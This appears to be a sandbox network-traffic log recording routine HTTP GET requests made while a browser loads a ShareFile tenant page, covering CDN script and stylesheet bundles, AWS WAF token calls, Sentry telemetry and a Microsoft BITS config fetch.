Source: global trafficHTTP traffic detected: GET /bundles/7ba6967109e88a8ecd8d.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=5FGP81tyGxUNz5m4yQ4dBH7FyGFSacBlWPJd+6nCxzunFfuHEAACT5kpbNDA3WRYWTZa052JrcNskLZKkikbe2c4j74yUaXW0XvhKa1yRmMOV29m3jaNq7YpDSd74dUx+y8rh15a/vdAAlS1PNUwip+/QfSneqwnoSLNuWaibxVb; AWSALBTGCORS=5FGP81tyGxUNz5m4yQ4dBH7FyGFSacBlWPJd+6nCxzunFfuHEAACT5kpbNDA3WRYWTZa052JrcNskLZKkikbe2c4j74yUaXW0XvhKa1yRmMOV29m3jaNq7YpDSd74dUx+y8rh15a/vdAAlS1PNUwip+/QfSneqwnoSLNuWaibxVb; AWSALB=gARLScAFO8trFu6DtZItKILC30QADn78brlDMvoUsb50V9llc0LJJTY7j3xxsb6s7fAzVY9vVXbtcnV0Rid83Jbcrcx071xkxmZMXbKaWWlsC4rCsTk1XjfcVrRw; AWSALBCORS=gARLScAFO8trFu6DtZItKILC30QADn78brlDMvoUsb50V9llc0LJJTY7j3xxsb6s7fAzVY9vVXbtcnV0Rid83Jbcrcx071xkxmZMXbKaWWlsC4rCsTk1XjfcVrRw
Source: global trafficHTTP traffic detected: GET /sf/v3/Accounts/Branding HTTP/1.1Host: averellharriman.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTGCORS=kcacQpXWo2/n9WIEBYCjup/TiLyy1YN3rksFjWFkA4qc8LQBhXs2CsF2Ddb8vZOdcEsS6CHblDPLdLgoWYTw8TIW/vjRPvExUyi2oVGBbsNuMCdZW0E+9lxecxz1w/zs3tc51+rnLcQHBQlpz/sJ/8zaOIx3TtbueixkoXXFHd2J; AWSALBCORS=bBYtQMvH4SMfqQ3yY3v0x9VBqt2wrRPPPG0F7qmHv4xYuko4DvQJcOQ3xzvev5Lg5NnOJQl9NuX9qgoO57GQWBO7/UpCvS1f4U+FuZIhq9dOipt89j4yIz/O2HB7
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-conversations-pilet/1.94.10/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-workflows-pilet/0.120.9/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-esign-pilet/1.220.5/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-user-actions-pilet/1.15.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-remediation-pilet/1.3.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/verify HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/92fe442fb8f2d1f7093b.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=EhbnCdp2674iUdAi0tzEBMd9KKHhUXjjPbW/07O1friWg2FQBD9drbCQoAOhrmgOjtNxnVhM7Umo1CSGVySSgN6Pb+FaOlLAAoA2zbnlaJGLzeePfMgc/4I9ePoGIkm93RWt4xWPn0jYDYp2jCfeG11aFpF0RFAIoufgUDnFGoAB; AWSALBTGCORS=EhbnCdp2674iUdAi0tzEBMd9KKHhUXjjPbW/07O1friWg2FQBD9drbCQoAOhrmgOjtNxnVhM7Umo1CSGVySSgN6Pb+FaOlLAAoA2zbnlaJGLzeePfMgc/4I9ePoGIkm93RWt4xWPn0jYDYp2jCfeG11aFpF0RFAIoufgUDnFGoAB; AWSALB=HPaRlb9XNhPMHa8/hEmODeucIk/UL0IkAlr3X0d7FS0Nxd/JlJDAT9O5k7ur/rFR4O1EKsTOvWA1ckFRYkQlogVPChLPKs2LgcpqMgDn/aKNEE5o6YxQQaKSSZsq; AWSALBCORS=HPaRlb9XNhPMHa8/hEmODeucIk/UL0IkAlr3X0d7FS0Nxd/JlJDAT9O5k7ur/rFR4O1EKsTOvWA1ckFRYkQlogVPChLPKs2LgcpqMgDn/aKNEE5o6YxQQaKSSZsq; aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAgiCI0GEFAQAA:+SNh7mvQwlP/a7bOrkBO0LBXiWAGtEP9d+BlWdupFgRBzwqY5V2tfBfudBv/zYW894Zw3PpKHqLhRIRsbGyOy0d8vMdLQGs8N0w/rf6uyITgAdSCJOg6s7Ngh06RU+aqYWMPggUCO63E4WfnlZsL3VmaGIirmid7iio6uY4k3wCbUJgJTucxuXW/FJU7YAkQuEstLeFtY6IB2WdAkGNUiQ==
Source: global trafficHTTP traffic detected: GET /api/4506735163932672/envelope/?sentry_key=0be0069dd70d0ce2c63c650418f56fa6&sentry_version=7&sentry_client=sentry.javascript.react%2F7.100.1 HTTP/1.1Host: o49063.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-remediation-pilet/1.3.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-conversations-pilet/1.94.10/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-conversations-pilet/1.94.10/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-request-list-pilet/1.10.1/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-fileviewer-pilet/1.32.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-user-actions-pilet/1.15.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-audit-collector-pilet/0.20.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-esign-pilet/1.220.5/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-esign-pilet/1.220.5/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-workflows-pilet/0.120.9/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-templates-pilet/0.110.3/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dc-pilet/1.423.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-doc-gen-pilet/1.2.105/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-request-list-pilet/1.10.1/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-request-list-pilet/1.10.1/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-audit-collector-pilet/0.20.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-audit-collector-pilet/0.20.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-fileviewer-pilet/1.32.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-fileviewer-pilet/1.32.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-notification-center/0.11.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dc-pilet/1.423.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dc-pilet/1.423.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-templates-pilet/0.110.3/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-templates-pilet/0.110.3/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
